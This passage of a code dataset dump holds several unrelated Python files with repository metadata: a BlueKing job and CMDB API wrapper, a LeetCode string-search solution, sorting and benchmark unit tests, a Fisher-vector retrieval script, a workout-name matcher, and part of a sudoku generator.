\"/root/test_push_file.txt\" # 源目标主机的源文件路径\n ],\n \"account\": \"root\",\n \"ip_list\": [\n {\n \"bk_cloud_id\": 0,\n \"ip\": \"192.168.148.103\" # 源目标主机\n },\n ],\n # \"custom_query_id\": [\n # \"3\"\n # ]\n }\n ],\n \"ip_list\": [\n {\n \"bk_cloud_id\": 0,\n \"ip\": \"192.168.148.104\" # 目标主机\n },\n ],\n }\n res = client.job.fast_push_file(**params)\n\n if res.get('code') == 0:\n return True\n\n\n# 快速执行脚本\ndef job_fast_execute_script(request):\n \"\"\"\n 快速执行脚本\n :param request:\n :return:\n \"\"\"\n bk_cloud_id = 0\n ip = \"192.168.148.103\"\n biz_id = 2\n ip_list = [{\n \"bk_cloud_id\": bk_cloud_id,\n \"ip\": ip\n }]\n client = get_client_by_request(request)\n content = \"\"\"\n #!/bin/bash\n cat /proc/loadavg\n \"\"\" # 脚本内容\n params = {\n 'bk_username': 'admin',\n 'bk_biz_id': int(biz_id),\n 'script_content': base64.b64encode(content),\n 'account': \"root\",\n 'bk_callback_url': \"root\",\n 'script_type': 1,\n 'ip_list': 
ip_list,\n } # 参数\n resp = client.job.fast_execute_script(**params)\n\n if resp.get('code') == 0:\n return resp[\"data\"]\n\n\n# 获取脚本执行状态,判断脚本是否已经执行完成\ndef job_get_job_instance_status(request):\n global count\n count += 1\n client = get_client_by_request(request)\n # 查询执行状态\n resp = client.job.get_job_instance_status(\n bk_username='admin',\n bk_biz_id=2,\n job_instance_id=3667430\n )\n if resp.get('data', {}).get('is_finished'):\n count = 0\n return True\n\n\n# 获取脚本执行结果\ndef job_get_job_instance_log(request):\n client = get_client_by_request(request)\n # 查询日志\n resp = client.job.get_job_instance_log(\n job_instance_id=3667430,\n bk_biz_id=2,\n bk_username='admin'\n )\n ip_logs = resp.get(\"data\")[0].get('step_results')[0].get(\"ip_logs\")\n return ip_logs\n\n\n# 启动作业\ndef job_execute_job(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2,\n \"bk_job_id\": 1,\n }\n res = client.job.execute_job(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 快速执行SQL脚本\ndef job_fast_execute_sql(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2,\n \"script_id\": 1,\n \"script_content\": base64.b64encode(\"show databases\"),\n \"script_timeout\": 1000,\n \"db_account_id\": 32,\n \"ip_list\": [\n {\n \"bk_cloud_id\": 0,\n \"ip\": \"192.168.102.152\"\n },\n {\n \"bk_cloud_id\": 0,\n \"ip\": \"192.168.102.151\"\n }\n ]\n }\n res = client.job.fast_execute_sql(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 查询用户有权限的DB帐号列表\ndef job_get_own_db_account_list(request):\n client = get_client_by_request(request)\n params = {\n \"bk_username\": \"admin\",\n \"bk_biz_id\": 2, # 业务ID\n }\n res = client.job.get_own_db_account_list(**params)\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 更新定时作业状态\ndef job_update_cron_status(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2,\n \"cron_status\": 1, # 1.启动、2.暂停\n \"cron_id\": 2\n }\n res = client.job.update_cron_status(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 新建或保存定时作业\ndef job_save_cron(request):\n client = get_client_by_request(request)\n params = {\n 'bk_username': 'admin',\n \"bk_biz_id\": 1,\n \"bk_job_id\": 100,\n \"cron_name\": \"test\",\n \"cron_expression\": \"0 0/5 * * * ?\"\n }\n res = client.job.save_cron(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 更新定时作业状态\ndef job_change_cron_status(request):\n client = get_client_by_request(request)\n params = {\n \"bk_biz_id\": 2,\n \"cron_status\": 1, # 1.启动、2.暂停\n \"cron_id\": 1\n }\n res = client.job.update_cron_status(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n################### 蓝鲸配置平台 #######################\n\n\n# 获取所有业务,测试OK\ndef cc_search_business(request, fields=[]):\n \"\"\"\n 获取业务列表\n :param request:\n :return:\n \"\"\"\n client = get_client_by_request(request)\n params = {'fields': fields}\n res = client.cc.search_business(**params)\n if res.get('code') == 0:\n return res.get('data', {}).get('info', [])\n\n\n# 根据业务ID查询集群,测试OK\ndef cc_search_set(request):\n client = get_client_by_request(request)\n params = {\n 'bk_biz_id': 2,\n \"fields\": [\"bk_set_id\", \"bk_set_name\"]\n }\n res = client.cc.search_set(**params)\n if res.get('code') == 0:\n return res.get('data', '').get('info', [])\n\n\n# 根据条件查询主机,测试OK\ndef cc_search_host(request):\n client = 
get_client_by_request(request)\n params = {\n \"condition\": [\n {\"bk_obj_id\": \"set\", \"fields\": [], \"condition\": []},\n {\"bk_obj_id\": \"host\", \"fields\": [], \"condition\": []},\n {\"bk_obj_id\": \"module\", \"fields\": [], \"condition\": []},\n {\"bk_obj_id\": \"biz\", \"fields\": [], \"condition\": []},\n {\"bk_obj_id\": \"object\", \"fields\": [], \"condition\": []}\n ]\n }\n res = client.cc.search_host(**params) # 根据业务ID和集群ID查询主机\n if res.get('code') == 0:\n return res.get('data', '').get('info', [])\n\n\n# 获取主机详情\ndef cc_get_host_base_info(request):\n client = get_client_by_request(request)\n params = {\"bk_host_id\": 224}\n res = client.cc.get_host_base_info(**params)\n if res.get('code') == 0:\n return res.get('data', [])\n\n\n# 查询业务实例拓扑,测试OK\ndef cc_search_biz_inst_topo(request, bk_biz_id):\n client = get_client_by_request(request)\n params = {\"bk_biz_id\": bk_biz_id}\n res = client.cc.search_biz_inst_topo(**params)\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 查询实例\ndef cc_search_inst_by_object(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"bk_obj_id\": \"biz\",\n \"page\": {\n \"start\": 0,\n \"limit\": 50,\n \"sort\": \"bk_inst_id\"\n },\n \"fields\": [],\n \"condition\": {}\n }\n res = client.cc.search_inst_by_object(**params)\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 查询模块\ndef cc_search_module(request):\n client = get_client_by_request(request)\n params = {\n 'bk_biz_id': 2,\n 'bk_set_id': 2,\n \"bk_supplier_account\": \"0\",\n \"fields\": [],\n \"condition\": {},\n \"page\": {\n \"start\": 0,\n \"limit\": 10\n }\n }\n res = client.cc.search_module(**params)\n if res.get('code') == 0:\n return res.get('data')\n\n\n# 创建模块\ndef cc_create_module(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"bk_biz_id\": 1,\n \"bk_set_id\": 10,\n \"data\": {\n \"bk_parent_id\": 10,\n \"bk_module_name\": \"test\"\n }\n }\n res = client.cc.create_module(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 创建集群\ndef cc_create_set(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"bk_biz_id\": 2,\n \"data\": {\n \"bk_parent_id\": 1,\n \"bk_set_name\": \"test-set\",\n \"bk_set_desc\": \"test-set\",\n \"bk_capacity\": 1000,\n \"description\": \"description\"\n }\n }\n res = client.cc.create_set(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 删除业务\ndef cc_delete_business(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"bk_biz_id\": 2,\n }\n res = client.cc.delete_business(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 删除主机\ndef cc_delete_host(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"bk_host_id\": \"1,2,3\",\n }\n res = client.cc.delete_host(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 删除模块\ndef cc_delete_module(request):\n client = get_client_by_request(request)\n params = {\n \"bk_supplier_account\": \"0\",\n \"bk_biz_id\": 1,\n \"bk_set_id\": 1,\n \"bk_module_id\": 1\n }\n res = client.cc.delete_module(**params)\n if res.get('code') == 0:\n return res.get('data')\n return res[\"message\"]\n\n\n# 删除集群\ndef cc_delete_set(request):\n client = get_client_by_request(request)\n params = {\n 
        \"bk_supplier_account\": \"0\",\n        \"bk_biz_id\": 1,\n        \"bk_set_id\": 1,\n    }\n    res = client.cc.delete_set(**params)\n    if res.get('code') == 0:\n        return res.get('data')\n    return res[\"message\"]\n\n\n# Update a business\ndef cc_update_business(request):\n    client = get_client_by_request(request)\n    params = {\n        'bk_biz_id': 2,\n        \"data\": {\n            \"bk_biz_name\": \"cc_app_test\",\n            \"bk_biz_maintainer\": \"admin\",\n            \"bk_biz_productor\": \"admin\",\n            \"bk_biz_developer\": \"admin\",\n            \"bk_biz_tester\": \"admin\",\n        }\n    }\n    res = client.cc.update_business(**params)\n    if res.get('code') == 0:\n        return res.get('data')\n    return res[\"message\"]\n\n\n# Update host attributes\ndef cc_update_host(request):\n    client = get_client_by_request(request)\n    params = {\n        'bk_username': 'admin',\n        \"bk_host_id\": \"1,2,3\",\n        \"data\": {\n            \"bk_host_name\": \"test\"\n        }\n    }\n    res = client.cc.update_host(**params)\n    if res.get('code') == 0:\n        return res.get('data')\n    return res[\"message\"]\n\n\n# Update a module\ndef cc_update_module(request):\n    client = get_client_by_request(request)\n    params = {\n        \"bk_supplier_account\": 0,\n        \"bk_biz_id\": 1,\n        \"bk_set_id\": 1,\n        \"bk_module_id\": 1,\n        \"data\": {\n            \"bk_module_name\": \"test\"\n        }\n    }\n    res = client.cc.update_module(**params)\n    if res.get('code') == 0:\n        return res.get('data')\n    return res[\"message\"]\n\n\n# Update a set\ndef cc_update_set(request):\n    client = get_client_by_request(request)\n    params = {\n        \"bk_supplier_account\": \"0\",\n        \"bk_biz_id\": 1,\n        \"bk_set_id\": 1,\n        \"data\": {\n            \"bk_set_name\": \"test\"\n        }\n    }\n    res = client.cc.update_set(**params)\n    if res.get('code') == 0:\n        return res.get('data')\n    return res[\"message\"]\n","repo_name":"sususama5555/bk-framework","sub_path":"home_application/utils/bk_api_by_client.py","file_name":"bk_api_by_client.py","file_ext":"py","file_size_in_byte":17518,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
+{"seq_id":"32654006055","text":"class Solution(object):\n    def strStr(self, haystack, needle):\n        \"\"\"\n        :type haystack: str\n        :type needle: str\n        :rtype: int\n        \"\"\"\n        # Approach 1: use the built-in find\n        # if needle not in haystack:\n        #     return -1\n        # return haystack.find(needle)\n\n        # Approach 2: sliding window\n\n        l = len(needle)\n        # +1 so a needle at the very end of the haystack is still found\n        for i in range(len(haystack)-l+1):\n            if haystack[i:i+l]==needle:\n                return i\n        return -1\n\nif __name__=='__main__':\n    h = 'hello'\n    n = 'll'\n    print(Solution().strStr(h,n))","repo_name":"a752602882/Http_To_Do","sub_path":"leetcode/字符串/实现strStr().py","file_name":"实现strStr().py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"20195895226","text":"\nimport unittest\nfrom varapp.filters.sort import *\nfrom varapp.variants.variants_factory import variants_collection_factory\nfrom varapp.data_models.variants import VARIANT_FIELDS\nfrom django.test.client import RequestFactory\n\nclass TestSort(unittest.TestCase):\n    def setUp(self):\n        self.variants = variants_collection_factory(db='test')\n\n    def test_sort_from_request_ASC(self):\n
        \"\"\"Should sort variants by a specific column (string, int, or float), in ascending numerical or alphabetical order.\n        Compare with a manual sort.\n        Frequency columns can contain None values, which is why we use this Sort.\n        \"\"\"\n        for field in ['chrom','start','aaf_1kg_all']:\n            request = RequestFactory().get('', {'order_by': '{},ASC'.format(field)})\n            order = sort_from_request(request)\n            self.assertIsInstance(order, Sort)\n            self.assertEqual(order.key, field)\n            self.assertEqual(order.reverse, False)\n            var = self.variants.order_by(order.key, order.reverse)\n            col0 = [getattr(v,field) for v in self.variants]\n            col = [getattr(v,field) for v in var]\n            col0_nonull = [x for x in col0 if x is not None]\n            col0 = [None]*(len(col)-len(col0_nonull)) + sorted(col0_nonull)\n            self.assertEqual(col0, col)\n\n    def test_sort_from_request_DESC(self):\n        \"\"\"'DESC' should reverse the ordering,\n        except for Nones, which always sort as the smallest values.\"\"\"\n        for field in ['chrom','start','aaf_1kg_all']:\n            request = RequestFactory().get('', {'order_by': '{},DESC'.format(field)})\n            order = sort_from_request(request)\n            self.assertEqual(order.reverse, True)\n            var = self.variants.order_by(order.key, order.reverse)\n            col0 = [getattr(v,field) for v in self.variants]\n            col = [getattr(v,field) for v in var]\n            col0_nonull = [x for x in col0 if x is not None]\n            col0 = sorted(col0_nonull, reverse=True) + [None]*(len(col)-len(col0_nonull))\n            self.assertEqual(col0, col)\n\n\nclass TestSortableFields(unittest.TestCase):\n    \"\"\"Ultimately we want to be able to sort with respect to all possible exported fields.\"\"\"\n    #@unittest.skip('')\n    def test_sort_all(self):\n        \"\"\"Just check that it does not raise an error.\"\"\"\n        var = variants_collection_factory(db='test')\n        for field in VARIANT_FIELDS:\n            Sort(field, False).sort(var)\n\n\nif __name__ == '__main__':\n    unittest.main()\n","repo_name":"varapp/varapp-backend-py","sub_path":"tests/filters/test_sort.py","file_name":"test_sort.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"72"}
+{"seq_id":"14823790379","text":"# Owner(s): [\"module: dynamo\"]\n\nimport torch\nimport torch._dynamo as torchdynamo\nfrom torch.testing._internal.common_utils import TestCase, run_tests, TEST_CUDA\nimport unittest\n\ntry:\n    import tabulate # noqa: F401 # type: ignore[import]\n    from torch.utils.benchmark.utils.compile import bench_all\n    HAS_TABULATE = True\nexcept ImportError:\n    HAS_TABULATE = False\n\n@unittest.skipIf(not TEST_CUDA, \"CUDA unavailable\")\n@unittest.skipIf(not HAS_TABULATE, \"tabulate not available\")\nclass TestCompileBenchmarkUtil(TestCase):\n    def test_training_and_inference(self):\n        class ToyModel(torch.nn.Module):\n            def __init__(self):\n                super().__init__()\n                self.weight = torch.nn.Parameter(torch.Tensor(2, 2))\n\n            def forward(self, x):\n                return x * self.weight\n\n        torchdynamo.reset()\n        model = ToyModel().cuda()\n\n        inference_table = bench_all(model, torch.ones(1024, 2, 2).cuda(), 5)\n        self.assertTrue(\"Inference\" in inference_table and \"Eager\" in inference_table and \"-\" in inference_table)\n\n        training_table = bench_all(model, torch.ones(1024, 2, 2).cuda(), 5, optimizer=torch.optim.SGD(model.parameters(), lr=0.01))\n        self.assertTrue(\"Train\" in training_table and \"Eager\" in training_table and \"-\" in training_table)\n\nif __name__ == '__main__':\n
    run_tests()\n","repo_name":"pytorch/pytorch","sub_path":"test/test_compile_benchmark_util.py","file_name":"test_compile_benchmark_util.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"}
+{"seq_id":"39588368665","text":"import sys\nimport numpy as np\nimport numpy.linalg as LA\nimport scipy.linalg\nfrom sklearn.mixture import GaussianMixture\nfrom sklearn.preprocessing import normalize\nfrom sklearn.decomposition import PCA\nfrom sklearn.externals import joblib # deprecated in newer scikit-learn; plain \"import joblib\" works there\nfrom multiprocessing.dummy import Pool as ThreadPool\nfrom yael import ynumpy\nimport time, h5py\n\ndef calculateFV(img):\n    im_matrix_ = np.array(img)\n    # k is the GMM dimension\n    k = 256\n    n_sample = im_matrix_.shape[0]\n\n    # compute PCA and transform the samples\n    pca_transform = myPCA(im_matrix_, k)\n    im_matrix_ = pca_transform.transform(im_matrix_)\n\n    # train GMM\n    print(\"Start fitting GMM\")\n    GMM_ = GaussianMixture(n_components=k, covariance_type='diag', verbose_interval=1)\n    t1 = time.time()\n    GMM_.fit(im_matrix_)\n    print(\"GMM fit in {}\".format(time.time() - t1))\n\n    # Get GMM matrices\n    w_, mu_, sigma_ = GMM_.weights_, GMM_.means_, GMM_.covariances_\n\n    # Convert to FP32 (from FP64)\n    gmm = w_.astype('float32'), mu_.astype('float32'), sigma_.astype('float32')\n\n    # compute FVS\n    print(\"Processing FV of image i\")\n    # compute the Fisher vector, using only the derivative w.r.t mu\n    fv = ynumpy.fisher(gmm, im_matrix_, include='mu')\n    print(\"FV processed.\")\n    return fv\n\n\n# function to be mapped over\ndef calculateParallel(tensor, threads=16):\n    pool = ThreadPool(threads)\n    results = pool.map(calculateFV, tensor)\n    pool.close()\n    pool.join()\n    return np.array(results)\n\ndef process():\n    # make a big matrix with all image descriptors\n\n    t = time.time()\n\n    n_images = 256\n    n_windows = 500\n\n    all_desc = []\n\n    h5f = h5py.File(\"feature_matrix_with_windows.h5\", 'r')\n    for i in range(n_images):\n        feats = normalize(h5f['feature_matrix_image_{}'.format(i)][:], axis=1, norm='l2')\n        all_desc.append(feats)\n        print(feats.shape)\n    h5f.close()\n\n    # ensure that the descriptors are FP32 and put them in a matrix\n    image_descs = np.array(all_desc)\n\n\n    print(image_descs.shape)\n\n    image_fvs = calculateParallel(image_descs, threads=16)\n\n\n    # make one matrix with all FVs\n    image_fvs = np.vstack(image_fvs)\n    pca_transform_fvs = myPCA(image_fvs, 256)\n    image_fvs_ = pca_transform_fvs.transform(image_fvs)\n    print(\"FVS shape is: {}\".format(image_fvs_.shape))\n\n    # power-normalization\n    image_fvs_ = np.sign(image_fvs_) * np.abs(image_fvs_) ** 0.5\n\n    # L2 normalize\n    image_fvs_ = normalize(image_fvs_, norm='l2', axis=1)\n\n    print(\"Computation executed in: {}s\".format(time.time() - t))\n\n    # Save FVS PCA\n    joblib.dump(pca_transform_fvs, 'pca_transform_fvs.pkl')\n\n\n    # Save processed vectors that must be inserted in the DB\n    h5f = h5py.File(\"image_fvs.h5\", 'w')\n    h5f.create_dataset('image_fvs', data=np.real(image_fvs_))\n    h5f.close()\n\n    print(\"YAEL SCRIPT: Mission accomplished!\")\n    return \"YAEL SCRIPT: Mission accomplished!\"\n\n\ndef myPCA(matrix, dim):\n    print(\"Start calculating PCA of dim %s starting from %s\" % (dim, matrix.shape))\n    t1 = time.time()\n    pca = PCA(n_components=dim)\n    pca.fit(matrix)\n    print(\"PCA calculated in %s\" % (time.time() - t1))\n    return 
pca\n\n\nprocess()\n","repo_name":"fede-vaccaro/image-retrieval-web-engine","sub_path":"yael_script_window.py","file_name":"yael_script_window.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"33653532050","text":"from ast import keyword\nimport json\nimport difflib\n\ndb = open('workouts.json', 'r', encoding=\"utf-8\")\njson_db = json.load(db)\n\n\ndef format_entry(str, format):\n form_str = []\n for char in str:\n if(char.isdigit()):\n break\n else:\n form_str.append(char)\n return ''.join(form_str)+format\n\n\ndef map_ids(str, format):\n hold_list = [row['activity_name'] for row in json_db]\n best_matches = []\n for entry in str:\n best_match = difflib.get_close_matches(format_entry(\n entry, format=\"GYM\"), hold_list, n=1, cutoff=0.6)\n for row in json_db:\n if (row['activity_name'] == best_match[0]):\n best_matches.append(row)\n\n for n in best_matches:\n print(n)\n print('\\n')\n\n\nmap_ids(['Glute bridge with a band 20 reps', 'Goblet squat 20 reps', 'Fire hydrant 12 reps per side',\n 'Split squat 12 reps per leg', 'Sumo squat 20 reps'], format='GYM')\n\ndb.close()\n\n\n# ['Glute bridge with a band 20 reps', 'Goblet squat 20 reps', 'Fire hydrant 12 reps per side', 'Split squat 12 reps per leg', 'Sumo squat 20 reps']\n# ('Glute bridge to chest press GYM', '211', 'Glute bridge with a band 20 reps')\n# ('Goblet squat with a band GYM', '289', 'Goblet squat 20 reps')\n# ('Fire hydrant GYM', '262', 'Fire hydrant 12 reps per side')\n# ('Split Squat GYM', '263', 'Split squat 12 reps per leg')\n","repo_name":"Iurybub/JG_App","sub_path":"playground.py","file_name":"playground.py","file_ext":"py","file_size_in_byte":1384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14343251464","text":"\"\"\"\n给定一个数字,我们按照如下规则把它翻译为字符串:0翻译成“a”, 1翻译成“b”, ..... 11 翻译成“l”,...... 25 翻译成\"z\"。\n一个数字可能���多个翻译。例如, 12258有5种不同的翻译,分别是bccfi,bwfi, bczi, mcfi, mzi。\n请编程实现一个函数,用来计算一个数字有多少种不同的翻译方法。\n\"\"\"\nclass Solution(object):\n def translation_count(self, num):\n if len(num) < 1:\n return 0\n elif len(num) == 1:\n return 1\n elif len(num) == 2:\n return 2 if int(num) <= 25 else 1\n double = 0\n if int(num[:1]) <= 25:\n double = self.translation_count(num[2:])\n signal = self.translation_count(num[1:])\n return signal + double\n\nif __name__ == '__main__':\n s = Solution()\n print(s.translation_count(num=str(12258)))","repo_name":"yuyaxiong/interveiw_algorithm","sub_path":"剑指offer/把数字翻译成字符串.py","file_name":"把数字翻译成字符串.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42328190341","text":"# encoding: utf-8\n\nimport fanstatic.core as core\n\n\nclass CkanCustomRenderer(object):\n ''' Allows for in-line js and IE conditionals via fanstatic. '''\n def __init__(self, script=None, renderer=None, condition=None,\n other_browsers=False):\n self.script = script\n self.other_browsers = other_browsers\n self.renderer = renderer\n start = ''\n end = ''\n # IE conditionals\n if condition:\n start = ''\n if other_browsers:\n start += ''\n end = ' [[r1], [r2], ...[r9]]\n validate interactive cli game input\n row checker\n column checker\n box checker\n board checker\n replace func (prolly custom?) 
<-- look this up...\n    print the solved board out\n\noutput:\n    solved board\n    no brackets\n    spaces between numbers\n    possibly add lines\n\nnext:\n    implement with pygame for better visuals\n    optimization!\n'''\n\n'''\nDani suggestion/approval...\nI think a sudoku game would be within scope for this intensive,\nand the solver could be your bike or car, approved\n'''\n# readline prevents NULL from being submitted via cli\nimport os, sys, random, copy, math\nimport pygame as pg\nfrom pygame.locals import *\n\nsys.setrecursionlimit(10000)\n\nbox_coords = {1: [(0, 0), (0, 1), (0, 2), (1, 0), (1, 1), (1, 2), (2, 0), (2, 1), (2, 2)], \n2: [(0, 3), (0, 4), (0, 5), (1, 3), (1, 4), (1, 5), (2, 3), (2, 4), (2, 5)], \n3: [(0, 6), (0, 7), (0, 8), (1, 6), (1, 7), (1, 8), (2, 6), (2, 7), (2, 8)], \n4: [(3, 0), (3, 1), (3, 2), (4, 0), (4, 1), (4, 2), (5, 0), (5, 1), (5, 2)], \n5: [(3, 3), (3, 4), (3, 5), (4, 3), (4, 4), (4, 5), (5, 3), (5, 4), (5, 5)], \n6: [(3, 6), (3, 7), (3, 8), (4, 6), (4, 7), (4, 8), (5, 6), (5, 7), (5, 8)], \n7: [(6, 0), (6, 1), (6, 2), (7, 0), (7, 1), (7, 2), (8, 0), (8, 1), (8, 2)], \n8: [(6, 3), (6, 4), (6, 5), (7, 3), (7, 4), (7, 5), (8, 3), (8, 4), (8, 5)], \n9: [(6, 6), (6, 7), (6, 8), (7, 6), (7, 7), (7, 8), (8, 6), (8, 7), (8, 8)]}\n\nif not pg.font: print('Warning, fonts disabled')\nif not pg.mixer: print('Warning, sound disabled')\n\ndef parse_board(input):\n    '''Take the input string from the command line and convert it into something usable'''\n    usable = []\n    temp = []\n    for ind, num in enumerate(input):\n        if (ind+1)%9 != 0:\n            temp.append(int(num))\n        else:\n            temp.append(int(num))\n            usable.append(temp)\n            temp = []\n    return usable\n\ndef input_validator(input_string):\n    '''Validate the integers given via the cli\n    input_string - the prompt for the python input() function'''\n    valid_input = False\n    while not valid_input:\n        try:\n            testing_input = input(input_string)\n            if not testing_input.isnumeric():\n                print(\"Only numbers, please try again!\")\n            elif int(testing_input) < 1 or int(testing_input) > 9:\n                print(\"Must be between 1 and 9\")\n            else:\n                valid_input = True\n                return int(testing_input)\n        except EOFError:\n
            print(\"Not a number! Try again.\")\n            continue\n\ndef row_checker(board, num, row):\n    '''Return True if the number (num) is in the specified row (row)'''\n    if num in board[row]:\n        return True\n    return False\n\ndef col_checker(board, num, col):\n    '''Check if the number (num) is in the specified column (col)'''\n    for row in board:\n        if num == row[col]:\n            return True\n    return False\n\ndef box_checker(board, num, box):\n    '''\n    Checks if the number (num) is in the box (box)\n    '''\n    # get box based on coordinate pair\n    if isinstance(box, tuple):\n        for key, value in box_coords.items():\n            if box in value:\n                box = key\n\n    coords = box_coords[box]\n    for coord in coords:\n        if num == board[coord[0]][coord[1]]:\n            return True\n    return False\n\ndef board_checker(board):\n    '''Final check to make sure that the board is properly solved'''\n    for i in range(1, 10):\n        for c in range(9):\n            if not (row_checker(board, i, c) and col_checker(board, i, c) and box_checker(board, i, c+1)):\n                return False\n    return True\n\ndef get_row(board, row):\n    '''Return a list of all numbers placed within the specified row'''\n    row_nums = []\n    for num in board[row-1]:\n        if num != 0:\n            row_nums.append(num)\n    return row_nums\n\ndef get_column(board, col):\n    '''Return a list of all numbers placed within the specified column'''\n    column = []\n    for row in board:\n        if row[col-1] != 0:\n            column.append(row[col-1])\n    return column\n\ndef get_box(board, box):\n    '''Return a list of all numbers placed within the specified box'''\n    box_nums = []\n    coord_list = box_coords[box]\n    for coords in coord_list:\n        num = board[coords[0]][coords[1]]\n        if num != 0:\n            box_nums.append(num)\n    return box_nums\n\ndef duplicate_checker(board):\n    '''Checks rows, columns, and boxes for any duplicates \n    returns (the integer of the r/c/b, and a char of 'r','c','b') if there are duplicates\n    returns (0, empty string) if there are no duplicates'''\n    # possibly return the number that is duplicated\n    for i in range(1, 10):\n        row = get_row(board, i)\n        col = get_column(board, i)\n        box = get_box(board, i)\n        if len(row) != len(set(row)):\n            return (i, 'r')\n        if len(col) != len(set(col)):\n            return (i, 'c')\n        if len(box) != len(set(box)):\n            return (i, 'b') \n    return (0, '')\n\ndef generate_col(board, col):\n    # generate numbers to go into the column\n    col_pool = [1,2,3,4,5,6,7,8,9]\n    placed = get_column(board, col)\n    for num in placed:\n        col_pool.remove(num)\n    random.shuffle(col_pool)\n    # guarantee no repeats in rows or boxes\n    need_to_reshuffle = True\n    while need_to_reshuffle:\n        for ind, row in enumerate(board):\n            if ind+1 < len(board):\n                if row_checker(board, col_pool[ind], ind+1):\n                    random.shuffle(col_pool)\n                    need_to_reshuffle = True\n                    check_box = False\n                    break\n            else:\n                need_to_reshuffle = False\n                check_box = True\n                break\n        if check_box:\n            if box_checker(board, col_pool[0], math.ceil(col/3)) or box_checker(board, col_pool[1], math.ceil(col/3)):\n                random.shuffle(col_pool)\n                need_to_reshuffle = True\n            else:\n                need_to_reshuffle = False\n    return col_pool\n\ndef generate_box(board, box):\n    box_pool = [1,2,3,4,5,6,7,8,9]\n    placed = get_box(board, box)\n    for num in placed:\n        box_pool.remove(num)\n    return box_pool\n    \ndef generate_row(board, row):\n    row_pool = [1,2,3,4,5,6,7,8,9]\n    placed = get_row(board, row)\n    for num in placed:\n        row_pool.remove(num)\n    return row_pool\n\ndef fill_row(board, row, filler):\n    while len(filler) != 0:\n        for ind, spot in enumerate(board[row-1]):\n            to_remove = []\n            if spot == 0:\n                for num in filler:\n
                    if not col_checker(board, num, ind) and not box_checker(board, num, (row, ind)):\n                        board[row-1][ind] = num\n                        to_remove.append(num)\n                        break\n            for num in to_remove:\n                filler.remove(num)\n        if len(to_remove) == 0:\n            break\n    return board\n\ndef fill_col(board, col, filler):\n    for ind, row in enumerate(board):\n        if row[col-1] == 0:\n            board[ind][col-1] = filler[ind-1]\n    return board\n\ndef fill_box(board, box, filler):\n    '''fill in the specified box with a list of numbers (filler)'''\n    for coords in box_coords[box]:\n        to_remove = []\n        spot = board[coords[0]][coords[1]]\n        if spot == 0:\n            for num in filler:\n                if not row_checker(board, num, coords[0]) and not col_checker(board, num, coords[1]):\n                    board[coords[0]][coords[1]] = num\n                    to_remove.append(num)\n                    break\n        for number in to_remove:\n            filler.remove(number)\n    return board\n\ndef generator():\n    '''Generates a 2D array that is a solvable 9x9 SuDoKu board'''\n    # start from solved and slowly subtract\n    # randomly generate the first row and then\n    # r1 --> c1 --> b1 --> c4 --> b2 --> c7 --> b3\n    # r4 --> b4,5,6\n    # r7 --> b7,8,9\n    # pool of numbers\n    init_pool = [1,2,3,4,5,6,7,8,9]\n    # initialize empty board\n    board = [[0, 0, 0, 0, 0, 0, 0, 0, 0], \n    [0, 0, 0, 0, 0, 0, 0, 0, 0], \n    [0, 0, 0, 0, 0, 0, 0, 0, 0], \n    [0, 0, 0, 0, 0, 0, 0, 0, 0], \n    [0, 0, 0, 0, 0, 0, 0, 0, 0], \n    [0, 0, 0, 0, 0, 0, 0, 0, 0], \n    [0, 0, 0, 0, 0, 0, 0, 0, 0], \n    [0, 0, 0, 0, 0, 0, 0, 0, 0], \n    [0, 0, 0, 0, 0, 0, 0, 0, 0]]\n    # 1st row\n    board[0] = random.sample(init_pool, 9)\n    # generate and place the 1st column\n    c1_pool = generate_col(board, 1)\n    board = fill_col(board, 1, c1_pool)\n    # generate and place the first box\n    b1_pool = generate_box(board, 1)\n    board = fill_box(board, 1, b1_pool)\n    # generate and place the 4th column\n    c4_pool = generate_col(board, 4)\n    board = fill_col(board, 4, c4_pool)\n    # generate and place the second box\n    b2_pool = generate_box(board, 2)\n    board = fill_box(board, 2, b2_pool)\n    # generate and place the 7th column\n    c7_pool = generate_col(board, 7)\n    board = fill_col(board, 7, c7_pool)\n    # generate and place the third box\n    b3_pool = generate_box(board, 3)\n    board = fill_box(board, 3, b3_pool)\n    # generate and place the 4th row\n    r4_pool = generate_row(board, 4)\n    board = fill_row(board, 4, r4_pool)\n    # generate and place the fourth box\n    b4_pool = generate_box(board, 